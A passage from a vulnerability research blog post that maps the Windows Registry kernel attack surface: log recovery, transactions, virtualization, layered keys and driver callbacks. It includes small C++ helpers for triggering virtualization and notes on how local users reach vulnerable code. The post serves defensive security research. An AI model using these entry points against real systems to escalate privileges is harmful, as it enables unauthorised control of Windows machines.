8.1 to address performance issues that plagued the previous version. Both formats use the same header as the normal regf format (the first 512 bytes of the _HBASE_BLOCK structure, up to the CheckSum field), with the Type field set to 0x1 (legacy log file on Windows XP and newer), 0x2 (legacy log file on Windows 2000 and older), or 0x6 (incremental log file). Further at offset 0x200, legacy log files contain the signature 0x54524944 ("DIRT") followed by the "dirty vector", while incremental log files contain successive records represented by the magic value 0x454C7648 ("HvLE"). These formats are well-documented in two unofficial regf documentations: GitHub: libyal/libregf and GitHub: msuhanov/regf.  Additional information can be found in the "Stable storage" and "Incremental logging" subsections of the Windows Internals (Part 2, 7th Edition) book and its earlier editions. From a security perspective, it's important to note that LOG files are processed for app hives, so their handling is part of the local attack surface. On the other hand, this attack surface isn't particularly large, as it boils down to just a few functions that are called by the two highest-level routines: HvAnalyzeLogFiles and HvpPerformLogFileRecovery. The potential types of bugs are also fairly limited, mainly consisting of shallow memory safety violations. Two specific examples of vulnerabilities related to this functionality are CVE-2023-35386 and CVE-2023-38154.Log file parsing: KTM logs Besides ensuring atomicity at the level of individual operations, the Windows Registry also provides two ways to achieve atomicity for entire groups of operations, such as creating a key and setting several of its values as part of a single logical unit. These mechanisms are based on two different types of transactions: KTM transactions (managed by the Kernel Transaction Manager, implemented by the tm.sys driver) and lightweight transactions, which were designed specifically for the registry. Notably, lightweight transactions exist in memory only and are never written to disk, so they do not represent an attack vector during hive loading, because there is no file recovery logic. KTM transactions are available for use in any loaded hive that doesn't have the REG_APP_HIVE and REG_HIVE_NO_RM flags. To utilize them, a transaction object must first be created using the CreateTransaction API. The resulting handle is then passed to the RegOpenKeyTransacted, RegCreateKeyTransacted, or RegDeleteKeyTransacted registry functions. Finally, the entire transaction is committed via CommitTransaction. Windows attempts to guarantee that active transactions that are caught mid-commit during a sudden system shutdown will be rolled forward when the hive is loaded again. To achieve this, the Windows kernel employs the Common Log File System interface to save serialized records detailing individual operations to the .blf files that accompany the main hive file. When a hive is loaded, the system checks for unapplied changes in these .blf files. If any are found, it deserializes the individual records and attempts to redo all the actions described within them. This logic is primarily handled by the internal functions CmpRmAnalysisPhase, CmpRmReDoPhase, and CmpRmUnDoPhase, as well as the functions surrounding them in the control flow graph. Given that KTM transactions are never enabled for app hives, the possibility of an unprivileged user exploiting this functionality is severely limited. The only option is to focus on KTM log files associated with regular hives that a local user has some control over, namely the user hive (NTUSER.DAT) and the user classes hive (UsrClass.dat). If a transactional operation is performed on a user's HKCU hive, additional .regtrans-ms and .blf files appear in their home directory. Furthermore, if these files don't exist at first, they can be planted on the disk manually, and will be processed by the Windows kernel after logging out and logging back in. Interestingly, even when the KTM log files are actively in use, they have the read sharing mode enabled. This means that a user can write data to these logs by performing transactional operations, and read from them directly at the same time. Historically, the handling of KTM logs has been affected by a significant number of security issues. Between 2019 and 2020, James Forshaw reported three serious bugs in this code: CVE-2019-0959, CVE-2020-1377, and CVE-2020-1378. Subsequently, during my research, I discovered three more: CVE-2023-28271, CVE-2023-28272, and CVE-2023-28293. However, the strangest thing is that, according to my tests, the entire logic for restoring the registry state from KTM logs stopped working due to code refactoring introduced in Windows 10 1607 (almost 9 years ago) and has not been fixed since. I described this observation in another report related to transactions, in a section called "KTM transaction recovery code". I'm not entirely sure whether I'm making a mistake in testing, but if this is truly the case, it means that the entire recovery mechanism currently serves no purpose and only needlessly increases the system's attack surface. Therefore, it could be safely removed or, at the very least, actually fixed.Direct registry operations through standard syscalls Direct operations on keys and values are the core of the registry and make up most of its associated code within the Windows kernel. These basic operations don't need any special permissions and are accessible by all users, so they constitute the primary attack surface available to a local attacker. These actions have been summarized at the beginning of blog post #2, and should probably be familiar by now. As a recap, here is a table of the available operations, including the corresponding high-level API function, system call name, and internal kernel function name if it differs from the syscall: Operation name Registry API name(s) System call(s) Internal kernel handler (if different than syscall) Load hive RegLoadKey RegLoadAppKey NtLoadKeyNtLoadKey2 NtLoadKeyEx NtLoadKey3 - Count open subkeys in hive - NtQueryOpenSubKeys - Flush hive RegFlushKey NtFlushKey - Open key RegOpenKeyEx RegOpenKeyTransacted NtOpenKey NtOpenKeyEx NtOpenKeyTransacted NtOpenKeyTransactedEx CmpParseKey Create key RegCreateKeyEx RegCreateKeyTransacted NtCreateKey NtCreateKeyTransacted CmpParseKey Delete key RegDeleteKeyExRegDeleteKeyTransacted NtDeleteKey - Rename key RegRenameKey NtRenameKey - Set key security RegSetKeySecurity NtSetSecurityObject CmpSecurityMethod Query key security RegGetKeySecurity NtQuerySecurityObject CmpSecurityMethod Set key information - NtSetInformationKey - Query key information RegQueryInfoKey NtQueryKey - Enumerate subkeys RegEnumKeyEx NtEnumerateKey - Notify on key change RegNotifyChangeKeyValue NtNotifyChangeKey NtNotifyChangeMultipleKeys - Query key path - NtQueryObject CmpQueryKeyName Close key handle RegCloseKey NtClose CmpCloseKeyObject CmpDeleteKeyObject Set value RegSetValueEx NtSetValueKey - Delete value RegDeleteValue NtDeleteValueKey - Enumerate values RegEnumValue NtEnumerateValueKey - Query value data RegQueryValueEx NtQueryValueKey - Query multiple values RegQueryMultipleValues NtQueryMultipleValueKey - Some additional comments:A regular user can directly load only application hives, using the RegLoadAppKey function or its corresponding syscalls with the REG_APP_HIVE flag. Loading standard hives, using the RegLoadKey function, is reserved for administrators only. However, this operation is still indirectly accessible to other users through the NTUSER.MAN hive and the Profile Service, which can load it as a user hive during system login.When selecting API functions for the table above, I prioritized their latest versions (often with the "Ex" suffix, meaning "extended"). I also chose those that are the thinnest wrappers and closest in functionality to their corresponding syscalls on the kernel side. In the official Microsoft documentation, you'll also find many older/deprecated versions of these functions, which were available in early Windows versions and now exist solely for backward compatibility (e.g., RegOpenKey, RegEnumKey). Additionally, there are also helper functions that implement more complex logic on the user-mode side (e.g., RegDeleteTree, which recursively deletes an entire subtree of a given key), but they don't add anything in terms of the kernel attack surface.There are several operations natively supported by the kernel that do not have a user-mode equivalent, such as NtQueryOpenSubKeys or NtSetInformationKey. The only way to use these interfaces is to call their respective system calls directly, which is most easily achieved by calling their wrappers with the same name in the ntdll.dll library. Furthermore, even when a documented API function exists, it may not expose all the capabilities of its corresponding system call. For example, the RegQueryKeyInfo function returns some information about a key, but much more can be learned by using NtQueryKey directly with one of the supported information classes. Moreover, there is a group of syscalls that do require administrator rights (specifically SeBackupPrivilege, SeRestorePrivilege, or PreviousMode set to KernelMode). These syscalls are used either for registry management by the kernel or system services, or for purely administrative tasks (such as performing registry backups). They are not particularly interesting from a security research perspective, as they cannot be used to elevate privileges, but it is worth mentioning them by name:NtCompactKeysNtCompressKeyNtFreezeRegistryNtInitializeRegistryNtLockRegistryKeyNtQueryOpenSubKeysExNtReplaceKeyNtRestoreKeyNtSaveKeyNtSaveKeyExNtSaveMergedKeysNtThawRegistryNtUnloadKeyNtUnloadKey2NtUnloadKeyExIncorporating advanced features Despite the fact that most power users are familiar with the basic registry operations (e.g., from using Regedit.exe), there are still some modifiers that can change the behavior of these operations, thereby complicating their implementation and potentially leading to interesting bugs. To use these modifiers, additional steps are often required, such as enabling registry virtualization, creating a transaction, or loading a differencing hive. When this is done, the information about the special key properties are encoded within the internal kernel structures, and the key handle itself is almost indistinguishable from other handles as seen by the user-mode application. When operating on such advanced keys, the logic for their handling is executed in the standard registry syscalls transparently to the user. The diagram below illustrates the general, conceptual control flow in registry-related system calls: This is a very simplified outline of how registry syscalls work, but it shows that a function theoretically supporting one operation can actually hide many implementations that are dynamically chosen based on various factors. In terms of specifics, there are significant differences depending on the operation and whether it is a "read" or "write" one. For example, in "read" operations, the execution paths for transactional and non-transactional operations are typically combined into one that has built-in transaction support but can also operate without them. On the other hand, in "write" operations, normal and transactional operations are always performed differently, but there isn't much code dedicated to layered keys (except for the so-called key promotion operations), since when writing to a layered key, the state of keys lower on the stack is usually not as important. As for the "Internal operation handler" area marked within the large rectangle with the dotted line, these are internal functions responsible for the core logic of a specific operation, and whose names typically begin with "Cm" instead of "Nt". For example, for the NtDeleteKey syscall, the corresponding internal handler is CmDeleteKey, for NtQueryKey it is CmQueryKey, for NtEnumerateKey it is CmEnumerateKey, and so on. In the following sections, we will take a closer look at each of the possible complications.Predefined keys and symbolic links Predefined keys were deprecated in 2023, so I won't spend much time on them here. It's worth mentioning that on modern systems, it wasn't possible to create them in any way using the API, or even directly using syscalls. The only way to craft such a key in the registry was to create it in binary form in a controlled hive file and have it loaded via RegLoadAppKey or as a user hive. These keys had very strange semantics, both at the key node level (unusual encoding of _CM_KEY_NODE.ValueList) and at the kernel key body object level (non-standard value of _CM_KEY_BODY.Type). Due to the need to filter out these keys at an early stage of syscall execution, there are special helper functions whose purpose is to open the key by handle and verify whether it is or isn't a predefined handle (CmObReferenceObjectByHandle and CmObReferenceObjectByName). Consequently, hunting for bugs related to predefined handles involved verifying whether each syscall used the above wrappers correctly, and whether there was some other way to perform an operation on this type of key while bypassing the type check. As I have mentioned, this is now just a thing of the past, as predefined handles in input hives are no longer supported and therefore do not pose a security risk to the system. When it comes to symbolic links, this is a semi-documented feature that requires calling the RegCreateKeyEx function with the special REG_OPTION_CREATE_LINK flag to create them. Then, you need to set a value named "SymbolicLinkValue" and of type REG_LINK, which contains the target of the symlink as an absolute, internal registry path (\Registry\...) written using wide characters. From that point on, the link points to the specified path. However, it's important to remember that traversing symbolic links originating from non-system hives is heavily restricted: it can only occur within a single "trust class" (e.g., between the user hive and user classes hive of the same user). As a result, links located in app hives are never fully functional, because each app hive resides in its own isolated trust class, and they cannot reference themselves either, as references to paths starting with "\Registry\A" are blocked by the Windows kernel. As for auditing symbolic links, they are generally resolved during the opening/creation of a key. Therefore, the analysis mainly involves the CmpParseKey function and lower-level functions called within it, particularly CmpGetSymbolicLinkTarget, which is responsible for reading the target of a given symlink and searching for it in existing registry structures. Issues related to symlinks can also be found in registry callbacks registered by third-party drivers, especially those that handle the RegNtPostOpenKey/RegNtPostCreateKey and similar operations. Correctly handling "reparse" return values and the multiple call loops performed by the NT Object Manager is not an easy feat to achieve.Registry virtualization Registry virtualization, introduced in Windows Vista, ensures backward compatibility for older applications that assume administrative privileges when using the registry. This mechanism redirects references between HKLM\Software and HKU\_Classes\VirtualStore subkeys transparently, allowing programs to "think" they write to the system hive even though they don't have sufficient permissions for it. The virtualization logic, integrated into nearly every basic registry syscall, is mostly implemented by three functions: CmKeyBodyRemapToVirtualForEnum: Translates a real key inside a virtualized hive (HKLM\Software) to a virtual key inside the VirtualStore of the user classes hive during read-type operations. This is done to merge the properties of both keys into a single state that is then returned to the caller.CmKeyBodyRemapToVirtual: Translates a real key to its corresponding virtual key, and is used in the key deletion and value deletion operations. This is done to delete the replica of a given key in VirtualStore or one of its values, instead of its real instance in the global hive.CmKeyBodyReplicateToVirtual: Replicates the entire key structure that the caller wants to create in the virtualized hive, inside of the VirtualStore. All of the above functions have a complicated control flow, both in terms of low-level implementation (e.g., they implement various registry path conversions) and logically – they create new keys in the registry, merge the states of different keys into one, etc. As a result, it doesn't really come as a big surprise that the code has been affected by many vulnerabilities. Triggering virtualization doesn't require any special rights, but it does need a few conditions to be met: Virtualization must be specifically enabled for a given process. This is not the default behavior for 64-bit programs but can be easily enabled by calling the SetTokenInformation function with the TokenVirtualizationEnabled argument on the security token of the process.Depending on the desired behavior, the appropriate combination of VirtualSource/VirtualTarget/VirtualStore flags should be set in _CM_KEY_NODE.Flags. This can be achieved either through binary control over the hive or by setting it at runtime using the NtSetInformationKey call with the KeySetVirtualizationInformation argument.The REG_KEY_DONT_VIRTUALIZE flag must not be set in the _CM_KEY_NODE.VirtControlFlags field for a given key. This is usually not an issue, but if necessary, it can be adjusted either in the binary representation of the hive or using the NtSetInformationKey call with the KeyControlFlagsInformation argument.In specific cases, the source key must be located in a virtualizable hive. In such scenarios, the HKLM\Software\Microsoft\DRM key becomes very useful, as it meets this condition and has a permissive security descriptor that allows all users in the system to create subkeys within it. With regards to the first two points, many examples of virtualization-related bugs can be found in the Project Zero bug tracker. These reports include proof-of-concept code that correctly sets the appropriate flags. For simplicity, I will share that code here as well; the two C++ functions responsible for enabling virtualization for a given security token and registry key are shown below: BOOL EnableTokenVirtualization(HANDLE hToken, BOOL bEnabled) {   DWORD dwVirtualizationEnabled = bEnabled;   return SetTokenInformation(hToken,                              TokenVirtualizationEnabled,                              &dwVirtualizationEnabled,                              sizeof(dwVirtualizationEnabled)); } BOOL EnableKeyVirtualization(HKEY hKey,                              BOOL VirtualTarget,                              BOOL VirtualStore,                              BOOL VirtualSource) {   KEY_SET_VIRTUALIZATION_INFORMATION VirtInfo;   VirtInfo.VirtualTarget = VirtualTarget;   VirtInfo.VirtualStore = VirtualStore;   VirtInfo.VirtualSource = VirtualSource;   VirtInfo.Reserved = 0;   NTSTATUS Status = NtSetInformationKey(hKey,                                         KeySetVirtualizationInformation,                                         &VirtInfo,                                         sizeof(VirtInfo));   return NT_SUCCESS(Status); } And their example use: HANDLE hToken; HKEY hKey; // // Enable virtualization for the token. // if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {   printf("OpenProcessToken failed with error %u\n", GetLastError());   return 1; } EnableTokenVirtualization(hToken, TRUE); // // Enable virtualization for the key. // hKey = RegOpenKeyExW(...); EnableKeyVirtualization(hKey,                         /*VirtualTarget=*/TRUE,                         /*VirtualStore=*/ TRUE,                         /*VirtualSource=*/FALSE);Transactions There are two types of registry transactions: KTM and lightweight. The former are transactions implemented on top of the tm.sys (Transaction Manager) driver, and they try to provide certain guarantees of transactional atomicity both during system run time and even across reboots. The latter, as the name suggests, are lightweight transactions that exist only in memory and whose task is to provide an easy and quick way to ensure that a given set of registry operations is applied atomically. As potential attackers, there are three parts of the interface that we are interested in the most: creating a transaction object, rolling back a transaction, and committing a transaction. The functions responsible for all three actions in each type of transaction are shown in the table below: Operation KTM (API) KTM (system call) Lightweight (API) Lightweight (system call) Create transaction CreateTransaction NtCreateTransaction - NtCreateRegistryTransaction Rollback transaction RollbackTransaction NtRollbackTransaction - NtRollbackRegistryTransaction Commit transaction CommitTransaction NtCommitTransaction - NtCommitRegistryTransaction As we can see, the KTM has a public, documented API interface, which cannot be said for lightweight transactions that can only be used via syscalls. Their definitions, however, are not too difficult to reverse engineer, and they come down to the following prototypes: NTSTATUS NtCreateRegistryTransaction(PHANDLE OutputHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, ULONG Reserved); NTSTATUS NtRollbackRegistryTransaction(HANDLE Handle, ULONG Reserved); NTSTATUS NtCommitRegistryTransaction(HANDLE Handle, ULONG Reserved); Upon the creation of a transaction object, whether of type TmTransactionObjectType (KTM) or CmRegistryTransactionType (lightweight), its subsequent usage becomes straightforward. The transaction handle is passed to either the RegOpenKeyTransacted or the RegCreateKeyTransacted function, yielding a key handle. The key's internal properties, specifically the key body structure, will reflect its transactional nature. Operations on this key proceed identically to the non-transactional case, using the same functions. However, changes are temporarily confined to the transaction context, isolated from the global registry view. Upon the completion of all transactional operations, the user may elect either to discard the changes via a rollback, or apply them atomically through a commit. From the developer's perspective, this interface is undeniably convenient. From an attack surface perspective, there's a substantial amount of code underlying the transaction functionality. Firstly, the handler for each base operation includes code to verify that the key isn't locked by another transaction, to allocate and initialize a UoW (unit of work) object, and then write it to the internal structures that describe the transaction. Secondly, to maintain consistency with the new functionality, the existing non-transactional code must first abort all transactions associated with a given key before it can be modified. But that's not the end of the story. The commit process itself is also complicated, as it must cleverly circumvent various registry limitations resulting from its original design. In 2023, most of the code responsible for KTM transactions was removed as a result of CVE-2023-32019, but there is still a second engine that was initially responsible for lightweight transactions and now handles all of them. It consists of two stages: "Prepare" and "Commit". During the prepare stage, all steps that could potentially fail are performed, such as allocating all necessary cells in the target hive. Errors are allowed and correctly handled in the prepare stage, because the globally visible state of the registry does not change yet. This is followed by the commit stage, which is designed so that nothing can go wrong – it no longer performs any dynamic allocations or other complex operations, and its whole purpose is to update values in both the hive and the kernel descriptors so that transactional changes become globally visible. The internal prepare handlers for each individual operation have names starting with "CmpLightWeightPrepare" (e.g., CmpLightWeightPrepareAddKeyUoW), while the corresponding commit handlers start with "CmpLightWeightCommit" (e.g., CmpLightWeightCommitAddKeyUoW). These are the two main families of functions that are most interesting from a vulnerability research perspective. In addition to them, it is also worth analyzing the rollback functionality, which is used both when the rollback is requested directly by the user and when an error occurs in the prepare stage. This part is mainly handled by the CmpTransMgrFreeVolatileData function.Layered keys Layered keys are the latest major change of this type in the Windows Registry, introduced in 2016. They overturned many fundamental assumptions that had been in place until then. A given logical key no longer consists solely of one key node and a maximum of one active KCB, but of a whole stack of these objects: from the layer height of the given hive down to layer zero, which is the base hive. A key that has a key node may in practice be non-existent (if marked as a tombstone), and vice versa, a key without a key node may logically exist if there is an existing key with the same name lower in its stack. In short, this whole containerization mechanism has doubled the complexity of every single registry operation, because:Querying for information about a key has become more difficult, because instead of gathering information from just one key, it has to be potentially collected from many keys at once and combined into a coherent whole for the caller.Performing any "write" operations has become more difficult because before writing any information to the key at a given nesting level, you first need to make sure that the key and all its ancestors in a given hive exist, which is done in a complicated process called "key promotion".Deleting and renaming a key has become more difficult, because you always have to consider and correctly handle higher-level keys that rely on the one you are modifying. This is especially true for Merge-Unbacked keys, which do not have their own representation and only reflect the state of the keys at a lower level. This also applies to ordinary keys from hives under HKLM and HKU, which by themselves have nothing to do with differencing hives, but as an integral part of the registry hierarchy, they also have to correctly support this feature.Performing security access checks on a key has become more challenging due to the need to accurately pinpoint the relevant security descriptor on the key stack first. Overall, the layered keys mechanism is so complex that it could warrant an entire blog post (or several) on its own, so I won't be able to explain all of its aspects here. Nevertheless, its existence will quickly become clear to anyone who starts reversing the registry implementation. The code related to this functionality can be identified in many ways, for example: By references to functions that initialize the key node stack / KCB stack objects (i.e., CmpInitializeKeyNodeStack, CmpStartKcbStack, and CmpStartKcbStackForTopLayerKcb),By dedicated functions that implement a given operation specifically on layered keys that end with "LayeredKey" (e.g., CmDeleteLayeredKey, CmEnumerateValueFromLayeredKey, CmQueryLayeredKey), By references to the KCB.LayerHeight field, which is very often used to determine whether the code is dealing with a layered key (height greater than zero) or a base key (height equal to zero). I encourage those interested in further exploring this topic to read Microsoft's Containerized Configuration patent (US20170279678A1), the "Registry virtualization" section in Chapter 10 of Windows Internals (Part 2, 7th Edition), as well as my previous blog post #6, where I briefly described many internal structures related to layered keys. All of these references are great resources that can provide a good starting point for further analysis. When it comes to layered keys in the context of attack entry points, it's important to note that loading custom differencing hives in Windows is not straightforward. As I wrote in blog post #4, loading this type of hive is not possible at all through any standard NtLoadKey-family syscall. Instead, it is done by sending an undocumented IOCTL 0x220008 to \Device\VRegDriver, which then passes this request on to an internal kernel function named CmLoadDifferencingKey. Therefore, the first obstacle is that in order to use this IOCTL interface, one would have to reverse engineer the layout of its corresponding input structure. Fortunately, I have already done it and published it in the blog post under the VRP_LOAD_DIFFERENCING_HIVE_INPUT name. However, a second, much more pressing problem is that communicating with the VRegDriver requires administrative rights, so it can only be used for testing purposes, but not in practical privilege escalation attacks. So, what options are we left with? Firstly, there are potential scenarios where the exploit is packaged in a mechanism that legitimately uses differencing hives, e.g., an MSIX-packaged application running in an app silo, or a specially crafted Docker container running in a server silo. In such cases, we provide our own hives by design, which are then loaded on the victim’s system on our behalf when the malicious program or container is started. The second option is to simply ignore the inability to load our own hive and use one already present in the system. In a default Windows installation, many built-in applications use differencing hives, and the \Registry\WC key can be easily enumerated and opened without any problems (unlike \Registry\A). Therefore, if we launch a program running inside an app silo (e.g., Notepad) as a local user, we can then operate on the differencing hives loaded by it. This is exactly what I did in most of my proof-of-concept exploits related to this functionality. Of course, it is possible that a given bug will require full binary control over the differencing hive in order to trigger it, but this is a relatively rare case: of the 10 vulnerabilities I identified in this code, only two of them required such a high degree of control over the hive.Alternative registry attack targets The most crucial attack surface associated with the registry is obviously its implementation within the Windows kernel. However, other types of software interact with the registry in many ways and can be also prone to privilege escalation attacks through this mechanism. They are discussed in the following sections.Drivers implementing registry callbacks Another area where potential registry-related security vulnerabilities can be found is Registry Callbacks. This mechanism, first introduced in Windows XP and still present today, provides an interface for kernel drivers to log or interfere with registry operations in real-time. One of the most obvious uses for this functionality is antivirus software, which relies on registry monitoring. Microsoft, aware of this need but wanting to avoid direct syscall hooking by drivers, was compelled to provide developers with an official, documented API for this purpose. From a technical standpoint, callbacks can be registered using either the CmRegisterCallback function or its more modern version, CmRegisterCallbackEx. The documentation for these functions serves as a good starting point for exploring the mechanism, as it seamlessly leads to the documentation of the callback function itself, and from there to the documentation of all the structures that describe the individual operations. Generally speaking, callbacks can monitor virtually any type of registry operation, both before ("pre" callbacks) and after ("post" callbacks) it is performed. They can be used to inspect what is happening in the system and log the details of specific events of interest. Callbacks can also influence the outcome of an operation. In "pre" notifications, they can modify input data or completely take control of the operation and return arbitrary information to the caller while bypassing the standard operation logic. During "post" notification handling, it is possible to influence both the status returned to the user and the output data. Overall, depending on the amount and types of operations supported in a callback, a completely error-free implementation can be really difficult to write. It requires excellent knowledge of the inner workings of the registry, as well as a very thorough reading of the documentation related to callbacks. The contracts that exist between the Windows kernel and the callback code can be very complicated, so in addition to the sources mentioned above, it's also worth reading the entire separate series of seven articles detailing various callback considerations, titled Filtering Registry Calls. Here are some examples of things that can go wrong in the implementation of callbacks: Standard user-mode memory access bugs. As per the documentation (refer to the table at the bottom of the Remarks section), pointers to output data received in "post" type callbacks contain the original user-mode addresses passed to the syscall by the caller. This means that if the callback wants to reference this data in any way, the only guarantee it has is that these pointers have been previously probed. However, it is still important to access this memory within a try/except block and to avoid potential double-fetch vulnerabilities by always copying the data to a kernel-mode buffer first before operating on it.A somewhat related but higher-level issue is excessive trust in the output data structure within "post" callbacks. The problem is that some registry syscalls return data in a strictly structured way, and since the "post" callback executes before returning to user mode, it might seem safe to trust that the output data conforms to its documented format (if one wants to use or slightly modify it). An example of such a syscall is NtQueryKey, which returns a specific structure for each of the several possible information classes. In theory, it would appear that a malicious program has not yet had the opportunity to modify this data, and it should still be valid when the callback executes. In practice, however, this is not the case, because the output data has already been copied to user-mode, and there may be a parallel user thread modifying it concurrently. Therefore, it is very important that if one wants to use the output data in the "post" callback, they must first fully sanitize it, assuming that it may be completely arbitrary and is as untrusted as any other input data.Moving up another level, it's important to prevent confused deputy problems that exploit the fact that callback code runs with kernel privileges. For example, if a callback wanted to redirect access to certain registry paths to another location, and it used the ZwCreateKey call without the OBJ_FORCE_ACCESS_CHECK flag to do so, it would allow an attacker to create keys in locations where they normally wouldn't have access.Bugs in the emulation of certain operations in "pre"-type callbacks. If a callback decides to handle a given request on its own and signal this to the kernel by returning the STATUS_CALLBACK_BYPASS code, it is responsible for filling all important fields in the corresponding REG_XXX_KEY_INFORMATION structure so that, in accordance with the expected syscall behavior, the output data is correctly returned to the caller (source: "When a registry filtering driver's RegistryCallback routine receives a pre-notification [...]" and "Alternatively, if the driver changes a status code from failure to success, it might have to provide appropriate output parameters.").Bugs in "post"-type callbacks that change an operation's status from success to failure. If we want to block an operation after it has already been executed, we must remember that it has already occurred, with all its consequences and side effects. To successfully pretend that it did not succeed, we would have to reverse all its visible effects for the user and release the resources allocated for this purpose. For some operations, this is very difficult or practically impossible to do cleanly, so I would personally recommend only blocking operations at the "pre" stage and refraining from trying to influence their outcome at the "post" stage (source: "If the driver changes a status code from success to failure, it might have to deallocate objects that the configuration manager allocated.").Challenges presented by error handling within "post"-type callbacks. As per the documentation, the kernel only differentiates between a STATUS_CALLBACK_BYPASS return value and all others, which means that it doesn't really discern callback success or failure. This is somewhat logical since, at this stage, there isn't a good way to handle failures – the operation has already been performed. On the other hand, it may be highly unintuitive, as the Windows kernel idiom "if (!NT_SUCCESS(Status)) { return Status; }" becomes ineffective here. If an error is returned, it won't propagate to user mode, and will only cause premature callback exit, potentially leaving some important operations unfinished. To address this, you should design "post" callbacks to be inherently fail-safe (e.g., include no dynamic allocations), or if this isn't feasible, implement error handling cautiously, ensuring that minor operation failures don't compromise the callback's overall logical/security guarantees.Issues surrounding the use of a key object pointer passed to the callback, in one of a few specific scenarios where it can have a non-NULL value but not point to a valid key object. This topic is explored in a short article in Microsoft Learn: Invalid Key Object Pointers in Registry Notifications.Issues in open/create operation callbacks due to missing or incorrect handling of symbolic links and other redirections, which are characterized by the return values STATUS_REPARSE and STATUS_REPARSE_GLOBAL.Bugs that result from a lack of transaction support where it is needed. This could be an incorrect assumption that every operation performed on the registry is non-transactional and its effect is visible immediately, and not only after the transaction is committed. The API function that is used to retrieve the transaction associated with a given key (if it exists) during callback execution is CmGetBoundTransaction.Issues arising from using the older API version, CmCallbackGetKeyObjectID, instead of the newer CmCallbackGetKeyObjectIDEx. The older version has some inherent problems discussed in the documentation, such as returning an outdated key path if the key name has been changed by an NtRenameKey operation.Issues stemming from an overreliance on the CmCallbackGetKeyObjectID(Ex) function to retrieve a key's full path. A local user can cause these functions to deterministically fail by creating and operating on a key with a path length exceeding 65535 bytes (the maximum length of a string represented by the UNICODE_STRING structure). This can be achieved using the key renaming trick described in CVE-2022-37990, and results in the CmCallbackGetKeyObjectID(Ex) function returning the STATUS_INSUFFICIENT_RESOURCES error code. This is problematic because the documentation for this function does not mention this error code, and there is no way to defend against it from the callback's perspective. The only options are to avoid relying on retrieving the full key path altogether, or to implement a defensive fallback plan if this operation fails.Logical bugs arising from attempts to block access to certain registry keys by path, but neglecting the key rename operation, which can change the key's name dynamically and bypass potential filtering logic in the handling of the open/create operations. Notably, it's difficult to blame developers for such mistakes, as even the official documentation discourages handling NtRenameKey operations, citing its high complexity (quote: "Several registry system calls are not documented because they are rarely used [...]"). As we can see, developers using these types of callbacks can fall into many traps, and the probability of introducing a bug increases with the complexity of the callback's logic. As a security researcher, there are two approaches to enumerating this attack surface to find vulnerable callbacks: static and dynamic. The static approach involves searching the file system (especially C:\Windows\system32\drivers) for the "CmRegisterCallback" string, as every driver that registers a callback must refer to this function or its "Ex" equivalent. As for the dynamic approach, the descriptors of all callbacks in the system are linked together in a doubly-linked list that begins in the global nt!CallbackListHead object. Although the structure of these descriptors is undocumented, my analysis indicates that the pointer to the callback function is located at offset 0x28 in Windows 11. Therefore, all callbacks registered in the system at a given moment can be listed using the following WinDbg command: 0: kd> !list -x "dqs @$extret+0x28 L1" CallbackListHead fffff801`c42f6cd8  fffff801`c42f6cd0 nt!CmpPreloadedHivesList ffffdc88`d377e418  fffff801`56a48df0 WdFilter!MpRegCallback ffffdc88`d8610b38  fffff801`59747410 applockerfltr!SmpRegistryCallback ffffdc88`d363e118  fffff801`57a05dd0 UCPD+0x5dd0 ffffdc88`ed11d788  fffff801`c3c2ba50 nt!VrpRegistryCallback ffffdc88`d860c758  fffff801`597510c0 bfs!BfsRegistryCallback As shown, even on a clean Windows 11 system, the operating system and its drivers register a substantial number of callbacks. In the listing above, the first line of output can be ignored, as it refers to the nt!CallbackListHead object, which is the beginning of the list and not a real callback descriptor. The remaining functions are associated with the following modules: WdFilter!MpRegCallback: a callback registered by Windows Defender, the default antivirus engine running on Windows.applockerfltr!SmpRegistryCallback: a callback registered by the Smartlocker Filter Driver, which is one of the drivers that implement the AppLocker/SmartLocker functionality at the kernel level.UCPD+0x5dd0: a callback associated with the UCPD.sys driver, which expands to "User Choice Protection Driver". This is a module that prevents third-party software from modifying the default application settings for certain file types and protocols, such as web browsers and PDF readers. As we can infer from the format of this symbol and its unresolved name, Microsoft does not currently provide PDB debug symbols for the executable image, but some information online indicates that such symbols were once available for older builds of the driver.nt!VrpRegistryCallback: a callback implemented by the VRegDriver, which is part of the core Windows kernel executable image, ntoskrnl.exe. It plays a crucial role in the system, as it is responsible for redirecting key references to their counterparts within differencing hives for containerized processes. It is likely the most interesting and complex callback registered by default in Windows.bfs!BfsRegistryCallback: the callback is a component of the Brokering File System driver. It is primarily responsible for supporting secure file access for applications running in an isolated environment (AppContainers). However, it also has a relatively simple registry callback that supports key opening/creation operations. It is not entirely clear why the functionality wasn't simply incorporated into the VrpRegistryCallback, which serves a very similar purpose. In my research, I primarily focused on reviewing the callback invocations in individual registry operations (specifically calls to the CmpCallCallBacksEx function), and on the correctness of the VrpRegistryCallback function implementation. As a result, I discovered CVE-2023-38141 in the former area, and three further bugs in the VRegDriver (CVE-2023-38140, CVE-2023-36803 and CVE-2023-36576). These reports serve as a very good example of the many types of problems that can occur in registry callbacks.Privileged registry clients: programs and drivers The final attack target related to the registry are the highly privileged users of this interface, that is, user-mode processes running with administrator/system rights, and kernel drivers that operate on the registry. The registry is a shared resource by design, and apart from app hives mounted in the special \Registry\A key, every program in the system can refer to any active key as long as it has the appropriate permissions. And for a malicious user, this means that they can try to exploit weaknesses exhibited by other processes when interacting with the registry, and secondly, they can try to actively interfere with them. I can personally imagine two main types of issues related to incorrect use of the registry, and both of them are quite high-level by nature. The first concern is related to the fact that the registry, as a part of the NT Object Manager model, undergoes standard access control through security access checks. Each registry key is mandatorily assigned a specific security descriptor. Therefore, as the name implies, it is crucial for system security that each key's descriptor has the minimum permissions required for proper functionality, while aligning with the author's intended security model for the application. From a technical perspective, a specific security descriptor for a given key can be set either during its creation through the lpSecurityAttributes argument of RegCreateKeyExW, or separately by calling the RegSetKeySecurity API. If no descriptor is explicitly set, the key assumes a default descriptor based largely on the security settings of its parent key. This model makes sense from a practical standpoint. It allows most applications to avoid dealing with the complexities of custom security descriptors, while still maintaining a reasonable level of security, as high-level keys in Windows typically have well-configured security settings. Consider the well-known HKLM\Software tree, where Win32 applications have stored their global settings for many years. The assumption is that ordinary users have read access to the global configuration within that tree, but only administrators can write to it. If an installer or application creates a new subkey under HKLM\Software without explicitly setting a descriptor, it inherits the default security properties, which is sufficient in most cases. However, certain situations require extra care to properly secure registry keys. For example, if an application stores highly sensitive data (e.g., user passwords) in the registry, it is important to ensure that both read and write permissions are restricted to the smallest possible group of users 